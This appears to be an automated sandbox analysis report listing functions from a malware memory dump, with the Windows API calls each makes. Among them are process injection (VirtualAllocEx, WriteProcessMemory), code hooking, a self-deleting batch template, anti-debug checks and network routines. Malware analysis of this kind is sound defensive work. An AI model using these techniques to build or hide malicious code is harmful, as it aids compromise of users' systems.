Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

SetLastError.KERNEL32(00000000,?,00001000,?,?,00000000,?,00000001,?,00C3388E,?,00000CCA,?,?,00000001), ref: 00C39132

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C372C2, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 00C53993: memcpy.MSVCRT ref: 00C53AA4

Part of subcall function 00C2E524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 00C2E534

WriteFile.KERNEL32(?,?,00000005,?,00000000), ref: 00C3732F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C37347
FlushFileBuffers.KERNEL32(?), ref: 00C37361
SetEndOfFile.KERNEL32 ref: 00C3737B

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C2E4F0: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00C2E502

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C55A2D, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

GetTempFileNameW.KERNEL32(00000426,?,?,?), ref: 00C55A84
PathFindFileNameW.SHLWAPI(?), ref: 00C55A93
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00C55ACC
memcpy.MSVCRT ref: 00C55AF1

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4FC7C, Relevance: 6.1, APIs: 4, Instructions: 77

APIs

GetTickCount.KERNEL32 ref: 00C4FC87
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000002), ref: 00C4FC99
memcmp.MSVCRT ref: 00C4FCD3
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000002), ref: 00C4FD3F

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C52F53, Relevance: 6.1, APIs: 4, Instructions: 74

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00C52F68
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00C52F9D
WSAEventSelect.WS2_32 ref: 00C52FEB
WSASetLastError.WS2_32(?,?,?,?,?,?,00000000,?,?,?,?), ref: 00C52FFE

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2E141, Relevance: 6.1, APIs: 4, Instructions: 65

APIs

GlobalLock.KERNEL32 ref: 00C2E16A
EnterCriticalSection.KERNEL32(?,000000FF,00000000), ref: 00C2E1A6

Part of subcall function 00C2DE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,00C2E138,?,?,?,?,?,00000009,00000000), ref: 00C2DE7E
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DEEF
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF13
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF2A
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF4A
Part of subcall function 00C2DE64: LeaveCriticalSection.KERNEL32 ref: 00C2DF65

LeaveCriticalSection.KERNEL32(?,?,00C27854,?,000000FF,00000000), ref: 00C2E1CC

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

GlobalUnlock.KERNEL32 ref: 00C2E1D3

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C506B6, Relevance: 6.1, APIs: 4, Instructions: 59

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000104,00000000,?,00000000), ref: 00C506D4
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000103,00000000,?,?), ref: 00C50709
RegCloseKey.ADVAPI32(?), ref: 00C50718
RegCloseKey.ADVAPI32(?), ref: 00C50733

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4FBE9, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,00C4FEB0,?,?,?,?,00000002), ref: 00C4FBF4
GetTickCount.KERNEL32 ref: 00C4FC27
memcpy.MSVCRT ref: 00C4FC60
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00C4FEB0,?,?,?,?,00000002), ref: 00C4FC6C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2C86A, Relevance: 6.1, APIs: 4, Instructions: 52

APIs

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

DeleteCriticalSection.KERNEL32(?,?,?,?,00C2C856), ref: 00C2C8C2

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CloseHandle.KERNEL32 ref: 00C2C8DA
DeleteCriticalSection.KERNEL32(?,?,?,?,?,00C2C856), ref: 00C2C8E7
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00C2C856), ref: 00C2C8F0

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2AA04, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

GetTickCount.KERNEL32 ref: 00C2AA11
GetLastInputInfo.USER32(?), ref: 00C2AA24
GetLocalTime.KERNEL32(?), ref: 00C2AA48

Part of subcall function 00C4D979: SystemTimeToFileTime.KERNEL32(?,?), ref: 00C4D983

GetTimeZoneInformation.KERNEL32(?), ref: 00C2AA60

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C32F57, Relevance: 6.0, APIs: 4, Instructions: 39

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 00C32F6C
TranslateMessage.USER32(?), ref: 00C32F90
DispatchMessageW.USER32(?), ref: 00C32F9B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C32FAB

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3E1B7, Relevance: 6.0, APIs: 4, Instructions: 38

APIs

Part of subcall function 00C3568C: TlsSetValue.KERNEL32(00000001,00C554A7), ref: 00C35699

Part of subcall function 00C4BEE3: CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

Part of subcall function 00C44B8D: WaitForSingleObject.KERNEL32(00000000,00C554CE), ref: 00C44B95

GetCurrentThread.KERNEL32 ref: 00C3E1DF
SetThreadPriority.KERNEL32 ref: 00C3E1E6
WaitForSingleObject.KERNEL32(00001388), ref: 00C3E1F8

Part of subcall function 00C54181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C541A1
Part of subcall function 00C54181: Process32FirstW.KERNEL32(?,?), ref: 00C541C6
Part of subcall function 00C54181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00C5421D
Part of subcall function 00C54181: CloseHandle.KERNEL32 ref: 00C5423B
Part of subcall function 00C54181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00C54257
Part of subcall function 00C54181: memcmp.MSVCRT ref: 00C5426F
Part of subcall function 00C54181: CloseHandle.KERNEL32(?), ref: 00C542E7
Part of subcall function 00C54181: Process32NextW.KERNEL32(?,?), ref: 00C542F3
Part of subcall function 00C54181: CloseHandle.KERNEL32 ref: 00C54306

WaitForSingleObject.KERNEL32(00001388), ref: 00C3E211

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3EA5E, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001E9A0,00000000), ref: 00C3EA75
WaitForSingleObject.KERNEL32(?,00003A98), ref: 00C3EA87
TerminateThread.KERNEL32(?,00000000), ref: 00C3EA93
CloseHandle.KERNEL32 ref: 00C3EA9A

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2DE15, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

WaitForSingleObject.KERNEL32(?,00007530), ref: 00C2DE25
EnterCriticalSection.KERNEL32(?,?,00007530), ref: 00C2DE33
LeaveCriticalSection.KERNEL32(?,?,00007530), ref: 00C2DE48
WaitForSingleObject.KERNEL32(?,00007530), ref: 00C2DE52

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C513F4, Relevance: 6.0, APIs: 3, Instructions: 50

APIs

getpeername.WS2_32(?,?,?), ref: 00C51418
getsockname.WS2_32(?,?,?), ref: 00C51430
send.WS2_32(00000000,?,00000008,00000000), ref: 00C51461

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C36C17, Relevance: 6.0, APIs: 3, Instructions: 30

APIs

socket.WS2_32(?,00000001,00000006), ref: 00C36C23
connect.WS2_32 ref: 00C36C40
closesocket.WS2_32 ref: 00C36C4B

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C44CA0, Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 79

APIs

memcpy.MSVCRT ref: 00C44CC6

Part of subcall function 00C30243: CryptDestroyKey.ADVAPI32 ref: 00C3025A
Part of subcall function 00C30243: CryptImportKey.ADVAPI32(?,?,00000114,00000000,00000000), ref: 00C30278

memset.MSVCRT ref: 00C44D69

Part of subcall function 00C3028F: CryptGetKeyParam.ADVAPI32(?,00000009,?,?,00000000), ref: 00C302B0

Part of subcall function 00C29A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00C29ACA
Part of subcall function 00C29A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00C29AEF

Part of subcall function 00C302CE: CryptVerifySignatureW.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000114,?,00C44D47), ref: 00C3031F

Part of subcall function 00C30223: CryptDestroyKey.ADVAPI32 ref: 00C30235

Strings

\26}, xrefs: 00C44CBE

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4BE5A, Relevance: 5.8, APIs: 3, Instructions: 36

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

Part of subcall function 00C4BAD3: memcpy.MSVCRT ref: 00C4BAEE
Part of subcall function 00C4BAD3: StringFromGUID2.OLE32(?), ref: 00C4BB92

CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C4BEA0
GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00C4BEAC
CloseHandle.KERNEL32 ref: 00C4BEBA

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C52917, Relevance: 5.8, APIs: 3, Instructions: 30

APIs

WSACreateEvent.WS2_32(00000000,?,00C52C15,?,00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C5292D
WSAEventSelect.WS2_32(?,?,00C52CD1), ref: 00C52943
WSACloseEvent.WS2_32(?), ref: 00C52957

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4C3E0, Relevance: 5.7, APIs: 3, Instructions: 40

APIs

lstrlenW.KERNEL32(00C27C5C), ref: 00C4C3FC
lstrlenW.KERNEL32(?), ref: 00C4C402

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

memcpy.MSVCRT ref: 00C4C426

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C465F4, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 138

APIs

Part of subcall function 00C465A9: StrCmpNIA.SHLWAPI ref: 00C465C0

StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 00C4675C

Strings

script, xrefs: 00C46669 00C46693
nbsp;, xrefs: 00C46754

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C37058, Relevance: 5.7, APIs: 3, Instructions: 82

APIs

Part of subcall function 00C3DCF8: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00C3DD10
Part of subcall function 00C3DCF8: CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 00C3DD24
Part of subcall function 00C3DCF8: CloseHandle.KERNEL32 ref: 00C3DD37

GetFileSizeEx.KERNEL32(00000000,?), ref: 00C3708F

Part of subcall function 00C3DD44: UnmapViewOfFile.KERNEL32 ref: 00C3DD50
Part of subcall function 00C3DD44: MapViewOfFile.KERNEL32(?,00000001,00000000,00000000,00000000), ref: 00C3DD67

Part of subcall function 00C2E524: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,?), ref: 00C2E534

SetEndOfFile.KERNEL32 ref: 00C37105
FlushFileBuffers.KERNEL32(?), ref: 00C37110

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Part of subcall function 00C2E56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C2E594

Part of subcall function 00C36F3F: GetFileAttributesW.KERNEL32(?), ref: 00C36F50
Part of subcall function 00C36F3F: PathRemoveFileSpecW.SHLWAPI(?), ref: 00C36F85
Part of subcall function 00C36F3F: MoveFileExW.KERNEL32(?,?,00000001), ref: 00C36FCC
Part of subcall function 00C36F3F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00C36FE5
Part of subcall function 00C36F3F: Sleep.KERNEL32(00001388), ref: 00C37028
Part of subcall function 00C36F3F: FlushFileBuffers.KERNEL32 ref: 00C37036

Part of subcall function 00C3DCB8: UnmapViewOfFile.KERNEL32 ref: 00C3DCC4
Part of subcall function 00C3DCB8: CloseHandle.KERNEL32 ref: 00C3DCD7
Part of subcall function 00C3DCB8: CloseHandle.KERNEL32 ref: 00C3DCED

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C36B66, Relevance: 5.7, APIs: 2, Instructions: 57

APIs

select.WS2_32(00000000,?,00000000,00000000), ref: 00C36BC5
recv.WS2_32(?,?,?,00000000), ref: 00C36BD5

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3072F, Relevance: 5.7, APIs: 3, Instructions: 56

APIs

GetCurrentThreadId.KERNEL32 ref: 00C30730
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00C30767

Part of subcall function 00C30643: memset.MSVCRT ref: 00C30654

Part of subcall function 00C303FD: GetCurrentProcess.KERNEL32 ref: 00C30400
Part of subcall function 00C303FD: VirtualProtect.KERNEL32(00000000,00010000,00000020,?), ref: 00C30421
Part of subcall function 00C303FD: FlushInstructionCache.KERNEL32(?,00000000,00010000), ref: 00C3042A

ResumeThread.KERNEL32(?), ref: 00C307A8

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4589C, Relevance: 5.6, APIs: 3, Instructions: 50

APIs

EnterCriticalSection.KERNEL32(00C63510,?,00000001,?,?,00C45AB4,?,?,?,00000001), ref: 00C458B8
LeaveCriticalSection.KERNEL32(00C63510,?,?,00C45AB4,?,?,?,00000001), ref: 00C458DF

Part of subcall function 00C4575A: memset.MSVCRT ref: 00C45774
Part of subcall function 00C4575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C457BA

Part of subcall function 00C29A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00C29ACA
Part of subcall function 00C29A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00C29AEF

Part of subcall function 00C29B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00C29B41

_ultow.MSVCRT ref: 00C45926

Part of subcall function 00C29A2A: CryptDestroyHash.ADVAPI32 ref: 00C29A42
Part of subcall function 00C29A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00C29A53

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4D7AE, Relevance: 5.6, APIs: 3, Instructions: 47

APIs

CloseHandle.KERNEL32(?), ref: 00C4D7BF

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

InternetQueryOptionA.WININET(?,00000015,?,?), ref: 00C4D7FF
InternetCloseHandle.WININET(?), ref: 00C4D80A

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C445AE, Relevance: 5.6, APIs: 3, Instructions: 44

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C445D1
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C445E9
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00C44604

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C53629, Relevance: 5.6, APIs: 3, Instructions: 43

APIs

GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00C5363C
GetLastError.KERNEL32(?,00C35032,?,00000008,?,?,?,?,?,?,00C449E1,?,?,00000001), ref: 00C53646

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00C5366E

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3500E, Relevance: 5.6, APIs: 3, Instructions: 41

APIs

OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00C35020

Part of subcall function 00C53629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00C5363C
Part of subcall function 00C53629: GetLastError.KERNEL32(?,00C35032,?,00000008,?,?,?,?,?,?,00C449E1,?,?,00000001), ref: 00C53646
Part of subcall function 00C53629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00C5366E

GetTokenInformation.ADVAPI32(?,0000000C,00C62968,00000004,?), ref: 00C35048

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CloseHandle.KERNEL32(?), ref: 00C3505E

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C36EFA, Relevance: 5.6, APIs: 3, Instructions: 34

APIs

socket.WS2_32(?,00000002,00000011), ref: 00C36F09
bind.WS2_32 ref: 00C36F25
closesocket.WS2_32 ref: 00C36F30

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C303FD, Relevance: 5.6, APIs: 3, Instructions: 28

APIs

GetCurrentProcess.KERNEL32 ref: 00C30400
VirtualProtect.KERNEL32(00000000,00010000,00000020,?), ref: 00C30421
FlushInstructionCache.KERNEL32(?,00000000,00010000), ref: 00C3042A

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2F825, Relevance: 5.6, APIs: 1, Instructions: 19

APIs

InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C52968, Relevance: 5.6, APIs: 3, Instructions: 17

APIs

shutdown.WS2_32(?,00000002), ref: 00C52976
closesocket.WS2_32(?), ref: 00C5297F
WSACloseEvent.WS2_32(?), ref: 00C52992

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3E22A, Relevance: 5.6, APIs: 3, Instructions: 16

APIs

PathFindFileNameW.SHLWAPI(?), ref: 00C3E22E
PathRemoveExtensionW.SHLWAPI(?), ref: 00C3E242
CharUpperW.USER32(?,?,?,00C3E32B), ref: 00C3E24C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C36A19, Relevance: 5.6, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

Part of subcall function 00C3692C: EnterCriticalSection.KERNEL32(00C63510,00000024,00C3699F,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C3693C
Part of subcall function 00C3692C: LeaveCriticalSection.KERNEL32(00C63510,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C36966

HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C47011, Relevance: 5.5, APIs: 3, Instructions: 114

APIs

GetVersionExW.KERNEL32(00C62FD8), ref: 00C4702B
GetNativeSystemInfo.KERNEL32(?), ref: 00C47167
memset.MSVCRT ref: 00C4719C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3E4B6, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 81

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C3E4E9

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Part of subcall function 00C3E22A: PathFindFileNameW.SHLWAPI(?), ref: 00C3E22E
Part of subcall function 00C3E22A: PathRemoveExtensionW.SHLWAPI(?), ref: 00C3E242
Part of subcall function 00C3E22A: CharUpperW.USER32(?,?,?,00C3E32B), ref: 00C3E24C

Part of subcall function 00C4100A: RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 00C4103A

Sleep.KERNEL32(000001F4), ref: 00C3E57E

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C3E50A

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351ED9F, Relevance: 5.5, APIs: 3, Instructions: 75

APIs

IsDebuggerPresent.KERNEL32 ref: 0351EE89
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 0351EE93
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0351EEA0

Part of subcall function 0351F662: IsDebuggerPresent.KERNEL32 ref: 0352098D
Part of subcall function 0351F662: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035209A2
Part of subcall function 0351F662: UnhandledExceptionFilter.KERNEL32(0353E630), ref: 035209AD
Part of subcall function 0351F662: GetCurrentProcess.KERNEL32 ref: 035209C9
Part of subcall function 0351F662: TerminateProcess.KERNEL32 ref: 035209D0

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C29A5B, Relevance: 5.5, APIs: 2, Instructions: 68

APIs

Part of subcall function 00C299B5: CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000040), ref: 00C299CD

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00C29ACA
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00C29AEF

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C44159, Relevance: 5.5, APIs: 3, Instructions: 63

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00C44188

Part of subcall function 00C36A7D: memcpy.MSVCRT ref: 00C36A9C

WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00C441C7

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C441EE

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C45594, Relevance: 5.5, APIs: 3, Instructions: 61

APIs

Part of subcall function 00C5537E: HttpQueryInfoA.WININET(?,40000009,?,?,00000000), ref: 00C553E5
Part of subcall function 00C5537E: memset.MSVCRT ref: 00C553FB

GetSystemTime.KERNEL32(?), ref: 00C455BA

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

Sleep.KERNEL32(000005DC), ref: 00C455D3
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00C455DC

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C38162, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

TlsAlloc.KERNEL32(0000000C,00C38636,?,?,?,?,00000000,?), ref: 00C3816B
TlsGetValue.KERNEL32(?,00000001,0000000C), ref: 00C3817D
TlsSetValue.KERNEL32(?,?), ref: 00C381C2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C31AAE, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00C31ACA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C31AED
CloseHandle.KERNEL32 ref: 00C31AFA

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C306B9, Relevance: 5.5, APIs: 3, Instructions: 37

APIs

GetCurrentThreadId.KERNEL32 ref: 00C306CE
InterlockedCompareExchange.KERNEL32(00C6276C), ref: 00C306DA
VirtualProtect.KERNEL32(00000000,00010000,00000040,?), ref: 00C3071E

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3DCF8, Relevance: 5.5, APIs: 3, Instructions: 33

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00C3DD10
CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 00C3DD24
CloseHandle.KERNEL32 ref: 00C3DD37

Memory Dump Source

